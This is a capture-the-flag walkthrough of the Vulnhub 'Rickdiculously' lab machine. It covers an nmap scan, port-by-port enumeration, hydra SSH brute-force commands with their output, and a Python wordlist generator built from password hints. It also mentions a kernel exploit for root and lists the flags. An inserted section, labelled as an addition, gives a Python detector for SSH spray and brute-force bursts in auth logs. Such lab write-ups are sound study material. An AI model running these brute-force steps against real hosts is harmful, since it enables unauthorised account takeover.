
Vulnhub-Rickdiculously

0x01 Information Gathering

NMAP scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-17 22:37 CST
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 71.43% done; ETC: 22:38 (0:00:02 remaining)
Nmap scan report for 192.168.56.5
Host is up (0.00091s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.254
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh?
| fingerprint-strings:
| NULL:
|_ Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp open http Cockpit web service
|_http-title: Did not follow redirect to https://192.168.56.5:9090/
13337/tcp open unknown
| fingerprint-strings:
| NULL:
|_ FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
| 256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_ 256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519)
60000/tcp open tcpwrapped
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.80%I=7%D=7/17%Time=5F11B7C2%P=x86_64-unknown-linux-gnu%r
SF:(NULL,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x2
SF:04\.4\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.80%I=7%D=7/17%Time=5F11B7C2%P=x86_64-unknown-linux-gn
SF:u%r(NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.53 seconds

Analysis

  • Port 21: vsftpd allows anonymous login, and the pub directory is readable.
  • Port 22: connecting to it may yield some banner information; it might be a different service.
  • Port 80 is a web site, httpd 2.4.27.
  • Port 9090 is a server console?
  • Port 13337 hands us a flag directly, but we don't know what it is; we need to connect with nc and look.
  • Port 22222 is another SSH port; this is probably the real SSH.
  • Port 60000: unknown.

ftp

The FTP root contains only one readable flag file, and the pub directory holds nothing else. There is no directory traversal either. The trail probably ends here, though brute-forcing usernames remains an option later on.

Port 22: ssh?

$ nc 192.168.56.5 22
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)

Only a banner with the system version.

Port 80: HTTP

Directory scan results

Home page

robots

passwords

passwords.html

This page gives us a password, but we don't know the account, nor which service the password belongs to.

Under cgi-bin there is a root_shell, but visiting it only shows "under construction". tracertool.cgi is a traceroute tool; command execution is probably possible? (After trying, the filtering turned out to be very strict.)

HTTPS-9090

This is a login page, but everything I tried here was useless... (rabbit hole).

13337

Connecting with nc reveals only a flag.

60000

Connecting with nc shows a root shell, but apart from viewing the flag, no other commands can be executed.

22222

With no other way forward, the only option left is brute-forcing SSH; the password is the one found on port 80.

hydra -L ~/tools/rockyou.txt  -p ******  -s 22222 ssh://192.168.56.5 -vV -f -t 64

The brute force succeeded.

[22222][ssh] host: 192.168.56.5   login: Summer   password: ******

0x02 Privilege Escalation

The normal route

After brute-forcing the SSH password and logging in, you find that cat is disabled, so you have to use less or more. After some enumeration, Morty's home directory turns up journal.txt.zip and safe_password.jpg. Download the image and analyze it locally with binwalk; it gives you the password. Use that password to unzip journal.txt.zip; it tells you there is a safe file in RickSanchez's RICKS_SAFE directory.

This should be a binary program that only echoes something back when given the correct input. But we first need to copy the file into Summer's home directory before it can be run.

Run safe 131333

[[email protected] ~]$ ./safe 131333
decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name. @

Password hints: one uppercase letter, one digit, plus one word. Generate a dictionary file from these. A quick Google search finds the band's name.

get-password
import string

# Words from the band name (the clue points to Rick's old band)
words = ['The', 'Flesh', 'Curtains']
candidates = []
for upper in string.ascii_uppercase:   # 1 uppercase character (A-Z)
    for digit in '0123456789':         # 1 digit
        for w in words:                # one word of the band name
            # all six orderings of the three parts
            candidates.append(upper + digit + w)
            candidates.append(upper + w + digit)
            candidates.append(digit + upper + w)
            candidates.append(digit + w + upper)
            candidates.append(w + upper + digit)
            candidates.append(w + digit + upper)

# open the wordlist once instead of re-opening it for every entry
with open('rick-password.txt', 'w') as f:
    f.write('\n'.join(candidates) + '\n')

Finally, brute-force RickSanchez's password.

hydra -l RickSanchez  -P rick-password.txt  -s 22222 ssh://192.168.56.5 -vV -f -t 64
[22222][ssh] host: 192.168.56.5 login: RickSanchez password: *********
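Both hydra runs above (the -L username spray with a single password against port 22222, and the -P wordlist run against RickSanchez) leave a distinctive pattern in sshd's auth log. As an added example that is not part of the original writeup, this Python script picks such bursts out of syslog-format sshd lines and labels them; the sample log lines are constructed, with a made-up second source address.

```python
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$")

# Constructed sample log (not from the page): a -L spray ending in a valid Summer login,
# then a -P brute force against RickSanchez, then a lone failure from another host.
SAMPLE_LOG = """\
Jul 17 22:40:01 rick sshd[2101]: Failed password for invalid user admin from 192.168.56.254 port 51002 ssh2
Jul 17 22:40:01 rick sshd[2102]: Failed password for invalid user guest from 192.168.56.254 port 51003 ssh2
Jul 17 22:40:02 rick sshd[2103]: Failed password for Summer from 192.168.56.254 port 51004 ssh2
Jul 17 22:40:03 rick sshd[2105]: Accepted password for Summer from 192.168.56.254 port 51006 ssh2
Jul 17 22:55:10 rick sshd[2301]: Failed password for RickSanchez from 192.168.56.254 port 51200 ssh2
Jul 17 22:55:10 rick sshd[2302]: Failed password for RickSanchez from 192.168.56.254 port 51201 ssh2
Jul 17 22:55:11 rick sshd[2303]: Failed password for RickSanchez from 192.168.56.254 port 51202 ssh2
Jul 17 23:30:00 rick sshd[2500]: Failed password for Summer from 10.0.0.7 port 40000 ssh2
"""

def parse(log_text, year=2020):
    """Return sorted (timestamp, result, user, source_ip) tuples; unrelated lines are skipped."""
    events = []
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return sorted(events)

def detect(events, window=60, threshold=3):
    """Flag each source with >= threshold failures inside `window` seconds: many users in the
    burst = password spray (hydra -L), one user = brute force (hydra -P); '+success' marks an
    accepted login from the same source right after the burst."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    findings = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e[1] == "Failed"]
        i = 0
        while i < len(fails):
            burst = [e for e in fails[i:] if (e[0] - fails[i][0]).total_seconds() <= window]
            if len(burst) < threshold:
                i += 1
                continue
            kind = "password-spray" if len({e[2] for e in burst}) > 1 else "brute-force"
            end = burst[-1][0]
            if any(e[1] == "Accepted" and 0 <= (e[0] - end).total_seconds() <= window for e in evs):
                kind += "+success"
            findings.append((ip, burst[0][0].strftime("%H:%M:%S"), kind, len(burst)))
            i += len(burst)
    return findings
```

The "+success" finding is the one worth paging on: a burst of failures from one source followed by an accepted login is exactly what the Summer step above looked like from the server side.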

Nothing more needs to be said.

Kernel exploit

Checking the kernel version shows 4.11.8-300; a quick search turns up an exploit that can be used directly. The target has no gcc installed, however, so it has to be compiled on your own machine and uploaded. Run it and you are root.

0x03 FLAG

  1. FTP-21(FLAG{Whoa this is unexpected} - 10 Points)
  2. HTTP-80(FLAG{Yeah d- just don’t do it.} - 10 Points)
  3. HTTPS-9090(FLAG {There is no Zeus, in your face!} - 10 Points)
  4. 13337(FLAG:{TheyFoundMyBackDoorMorty}-10Points)
  5. 60000(FLAG{Flip the pickle Morty!} - 10 Points)
  6. 22222-Summer(FLAG{Get off the high road Summer!} - 10 Points)
  7. journal.txt.zip(FLAG: {131333}} - 20 Points)
  8. /home/RickSanchez/RICKS_SAFE/safe (FLAG{And Awwwaaaaayyyy we Go!} - 20 Points)
  9. /root/FLAG.txt(FLAG: {Ionic Defibrillator} - 30 points)